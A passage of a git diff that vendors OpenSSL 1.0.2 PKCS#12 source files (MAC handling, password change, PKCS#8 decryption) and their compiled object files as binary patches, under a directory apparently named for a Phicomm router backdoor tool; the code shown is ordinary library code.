+        PKCS12err(PKCS12_F_PKCS12_VERIFY_MAC, PKCS12_R_MAC_ABSENT);
+        return 0;
+    }
+    if (!PKCS12_gen_mac(p12, pass, passlen, mac, &maclen)) {
+        PKCS12err(PKCS12_F_PKCS12_VERIFY_MAC, PKCS12_R_MAC_GENERATION_ERROR);
+        return 0;
+    }
+    if ((maclen != (unsigned int)p12->mac->dinfo->digest->length)
+        || memcmp(mac, p12->mac->dinfo->digest->data, maclen))
+        return 0;
+    return 1;
+}
+
+/* Set a mac */
+
+int PKCS12_set_mac(PKCS12 *p12, const char *pass, int passlen,
+                   unsigned char *salt, int saltlen, int iter,
+                   const EVP_MD *md_type)
+{
+    unsigned char mac[EVP_MAX_MD_SIZE];
+    unsigned int maclen;
+
+    if (!md_type)
+        md_type = EVP_sha1();
+    if (PKCS12_setup_mac(p12, iter, salt, saltlen, md_type) == PKCS12_ERROR) {
+        PKCS12err(PKCS12_F_PKCS12_SET_MAC, PKCS12_R_MAC_SETUP_ERROR);
+        return 0;
+    }
+    if (!PKCS12_gen_mac(p12, pass, passlen, mac, &maclen)) {
+        PKCS12err(PKCS12_F_PKCS12_SET_MAC, PKCS12_R_MAC_GENERATION_ERROR);
+        return 0;
+    }
+    if (!(M_ASN1_OCTET_STRING_set(p12->mac->dinfo->digest, mac, maclen))) {
+        PKCS12err(PKCS12_F_PKCS12_SET_MAC, PKCS12_R_MAC_STRING_SET_ERROR);
+        return 0;
+    }
+    return 1;
+}
+
+/* Set up a mac structure */
+int PKCS12_setup_mac(PKCS12 *p12, int iter, unsigned char *salt, int saltlen,
+                     const EVP_MD *md_type)
+{
+    if (!(p12->mac = PKCS12_MAC_DATA_new()))
+        return PKCS12_ERROR;
+    if (iter > 1) {
+        if (!(p12->mac->iter = M_ASN1_INTEGER_new())) {
+            PKCS12err(PKCS12_F_PKCS12_SETUP_MAC, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (!ASN1_INTEGER_set(p12->mac->iter, iter)) {
+            PKCS12err(PKCS12_F_PKCS12_SETUP_MAC, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+    if (!saltlen)
+        saltlen = PKCS12_SALT_LEN;
+    p12->mac->salt->length = saltlen;
+    if (!(p12->mac->salt->data = OPENSSL_malloc(saltlen))) {
+        PKCS12err(PKCS12_F_PKCS12_SETUP_MAC, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (!salt) {
+        if (RAND_pseudo_bytes(p12->mac->salt->data, saltlen) < 0)
+            return 0;
+    } else
+        memcpy(p12->mac->salt->data, salt, saltlen);
+    p12->mac->dinfo->algor->algorithm = OBJ_nid2obj(EVP_MD_type(md_type));
+    if (!(p12->mac->dinfo->algor->parameter = ASN1_TYPE_new())) {
+        PKCS12err(PKCS12_F_PKCS12_SETUP_MAC, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    p12->mac->dinfo->algor->parameter->type = V_ASN1_NULL;
+
+    return 1;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_mutl.o
new file mode 100644
index 0000000000000000000000000000000000000000..e0b013979fc7dc5dc0418a8354b7717a2da5a1a2
GIT binary patch
literal 5360
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.c
new file mode 100644
index 0000000..a89b61a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.c
@@ -0,0 +1,235 @@
+/* p12_npas.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/pkcs12.h>
+
+/* PKCS#12 password change routine */
+
+static int newpass_p12(PKCS12 *p12, char *oldpass, char *newpass);
+static int newpass_bags(STACK_OF(PKCS12_SAFEBAG) *bags, char *oldpass,
+                        char *newpass);
+static int newpass_bag(PKCS12_SAFEBAG *bag, char *oldpass, char *newpass);
+static int alg_get(X509_ALGOR *alg, int *pnid, int *piter, int *psaltlen);
+
+/*
+ * Change the password on a PKCS#12 structure.
+ */
+
+int PKCS12_newpass(PKCS12 *p12, char *oldpass, char *newpass)
+{
+    /* Check for NULL PKCS12 structure */
+
+    if (!p12) {
+        PKCS12err(PKCS12_F_PKCS12_NEWPASS,
+                  PKCS12_R_INVALID_NULL_PKCS12_POINTER);
+        return 0;
+    }
+
+    /* Check the mac */
+
+    if (!PKCS12_verify_mac(p12, oldpass, -1)) {
+        PKCS12err(PKCS12_F_PKCS12_NEWPASS, PKCS12_R_MAC_VERIFY_FAILURE);
+        return 0;
+    }
+
+    if (!newpass_p12(p12, oldpass, newpass)) {
+        PKCS12err(PKCS12_F_PKCS12_NEWPASS, PKCS12_R_PARSE_ERROR);
+        return 0;
+    }
+
+    return 1;
+}
+
+/* Parse the outer PKCS#12 structure */
+
+static int newpass_p12(PKCS12 *p12, char *oldpass, char *newpass)
+{
+    STACK_OF(PKCS7) *asafes, *newsafes;
+    STACK_OF(PKCS12_SAFEBAG) *bags;
+    int i, bagnid, pbe_nid = 0, pbe_iter = 0, pbe_saltlen = 0;
+    PKCS7 *p7, *p7new;
+    ASN1_OCTET_STRING *p12_data_tmp = NULL, *macnew = NULL;
+    unsigned char mac[EVP_MAX_MD_SIZE];
+    unsigned int maclen;
+
+    if (!(asafes = PKCS12_unpack_authsafes(p12)))
+        return 0;
+    if (!(newsafes = sk_PKCS7_new_null()))
+        return 0;
+    for (i = 0; i < sk_PKCS7_num(asafes); i++) {
+        p7 = sk_PKCS7_value(asafes, i);
+        bagnid = OBJ_obj2nid(p7->type);
+        if (bagnid == NID_pkcs7_data) {
+            bags = PKCS12_unpack_p7data(p7);
+        } else if (bagnid == NID_pkcs7_encrypted) {
+            bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+            if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+                         &pbe_nid, &pbe_iter, &pbe_saltlen)) {
+                sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+                bags = NULL;
+            }
+        } else
+            continue;
+        if (!bags) {
+            sk_PKCS7_pop_free(asafes, PKCS7_free);
+            return 0;
+        }
+        if (!newpass_bags(bags, oldpass, newpass)) {
+            sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+            sk_PKCS7_pop_free(asafes, PKCS7_free);
+            return 0;
+        }
+        /* Repack bag in same form with new password */
+        if (bagnid == NID_pkcs7_data)
+            p7new = PKCS12_pack_p7data(bags);
+        else
+            p7new = PKCS12_pack_p7encdata(pbe_nid, newpass, -1, NULL,
+                                          pbe_saltlen, pbe_iter, bags);
+        sk_PKCS12_SAFEBAG_pop_free(bags, PKCS12_SAFEBAG_free);
+        if (!p7new) {
+            sk_PKCS7_pop_free(asafes, PKCS7_free);
+            return 0;
+        }
+        sk_PKCS7_push(newsafes, p7new);
+    }
+    sk_PKCS7_pop_free(asafes, PKCS7_free);
+
+    /* Repack safe: save old safe in case of error */
+
+    p12_data_tmp = p12->authsafes->d.data;
+    if (!(p12->authsafes->d.data = ASN1_OCTET_STRING_new()))
+        goto saferr;
+    if (!PKCS12_pack_authsafes(p12, newsafes))
+        goto saferr;
+
+    if (!PKCS12_gen_mac(p12, newpass, -1, mac, &maclen))
+        goto saferr;
+    if (!(macnew = ASN1_OCTET_STRING_new()))
+        goto saferr;
+    if (!ASN1_OCTET_STRING_set(macnew, mac, maclen))
+        goto saferr;
+    ASN1_OCTET_STRING_free(p12->mac->dinfo->digest);
+    p12->mac->dinfo->digest = macnew;
+    ASN1_OCTET_STRING_free(p12_data_tmp);
+
+    return 1;
+
+ saferr:
+    /* Restore old safe */
+    ASN1_OCTET_STRING_free(p12->authsafes->d.data);
+    ASN1_OCTET_STRING_free(macnew);
+    p12->authsafes->d.data = p12_data_tmp;
+    return 0;
+
+}
+
+static int newpass_bags(STACK_OF(PKCS12_SAFEBAG) *bags, char *oldpass,
+                        char *newpass)
+{
+    int i;
+    for (i = 0; i < sk_PKCS12_SAFEBAG_num(bags); i++) {
+        if (!newpass_bag(sk_PKCS12_SAFEBAG_value(bags, i), oldpass, newpass))
+            return 0;
+    }
+    return 1;
+}
+
+/* Change password of safebag: only needs handle shrouded keybags */
+
+static int newpass_bag(PKCS12_SAFEBAG *bag, char *oldpass, char *newpass)
+{
+    PKCS8_PRIV_KEY_INFO *p8;
+    X509_SIG *p8new;
+    int p8_nid, p8_saltlen, p8_iter;
+
+    if (M_PKCS12_bag_type(bag) != NID_pkcs8ShroudedKeyBag)
+        return 1;
+
+    if (!(p8 = PKCS8_decrypt(bag->value.shkeybag, oldpass, -1)))
+        return 0;
+    if (!alg_get(bag->value.shkeybag->algor, &p8_nid, &p8_iter, &p8_saltlen))
+        return 0;
+    if (!(p8new = PKCS8_encrypt(p8_nid, NULL, newpass, -1, NULL, p8_saltlen,
+                                p8_iter, p8)))
+        return 0;
+    X509_SIG_free(bag->value.shkeybag);
+    bag->value.shkeybag = p8new;
+    return 1;
+}
+
+static int alg_get(X509_ALGOR *alg, int *pnid, int *piter, int *psaltlen)
+{
+    PBEPARAM *pbe;
+    const unsigned char *p;
+
+    p = alg->parameter->value.sequence->data;
+    pbe = d2i_PBEPARAM(NULL, &p, alg->parameter->value.sequence->length);
+    if (!pbe)
+        return 0;
+    *pnid = OBJ_obj2nid(alg->algorithm);
+    *piter = ASN1_INTEGER_get(pbe->iter);
+    *psaltlen = pbe->salt->length;
+    PBEPARAM_free(pbe);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_npas.o
new file mode 100644
index 0000000000000000000000000000000000000000..ef8ae79955c7cf6294078d6b819dd6ed385c81f2
GIT binary patch
literal 4872
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
I!4Uob0JNa&TL1t6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.c
new file mode 100644
index 0000000..3cc7a9f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.c
@@ -0,0 +1,70 @@
+/* p12_p8d.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+PKCS8_PRIV_KEY_INFO *PKCS8_decrypt(X509_SIG *p8, const char *pass,
+                                   int passlen)
+{
+    return PKCS12_item_decrypt_d2i(p8->algor,
+                                   ASN1_ITEM_rptr(PKCS8_PRIV_KEY_INFO), pass,
+                                   passlen, p8->digest, 1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8d.o
new file mode 100644
index 0000000000000000000000000000000000000000..0d0aa583e4987d19b96ad9082a66eaa18d1d2685
GIT binary patch
literal 1648
zcmbtUJ8u&~5T1(zF<?YM6hT3eMS(z&mF<8qDZq~9M~D?ic_2~1>TF+#MQoqWYssd7
zI*KCYXHe48<uC9LXeogXA%&T{9p}89Dd3YPJM-<lZf2eL#cFBFvVdX16F9S&1xUrt
z^qjBe;4&oO$CZVj)x&bUa`^P%bN&;BRt~;bjvkWFSKqN*C@d%M?9}@m)lWVaOCq(H
ze$@BP^t((-q#oQ2X!4#$nMFB=QeNMIDS#8=xcqh03D(<9um-c%d}1bkj8%!h>E8g{
z(&yg}YIGXDoksb@A}2sSa2MlIF~93^j;t7*|C99jnF)M+0#DNz$0anch5F=gzJWZ=
z&qNA|D84j-2REIOZnh~Ju(4Ly%F3qG@P@9^*2d=QbGcT0Ay?N+HQ7=i%hlRSzA9^_
z(pGU>Zs%93Md>?Zo|bajoIo}+Ev!j>5^%q85#`rufCVBEwDSZC^GVbR<WDk!=ndP-
zu7l_)FF5yD^PGKKC}*HRG;L*rsP}px8r^o==^)qXDo5ZOTkI*j@kZOPJAL7LUDxr{
z5QLw>*^|4T-F8ML|3^t;FugtVW#o_}@E!vz@MWFOc@&yW4ke6%9t!Q5Kr^K}{G#TF
zMBGLp-h9b*x{Lt%hH)Pa%K5MHX^f?u+$X9&xc)sR^vU)4Tt=Stu<KFS2<fKpGrXf;
zpB~r9^H^)i5fdmpKc=Zq%4x=b)DGr%nei{tFKT}ubVA+}?T=zPp82TSRQe13L1gs@
m)BlGHC}uoy=I)S!IbHu186lYSyNY*F@h3WdKNL%<8UGsqOnqno

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.c
new file mode 100644
index 0000000..861a087
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.c
@@ -0,0 +1,105 @@
+/* p12_p8e.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
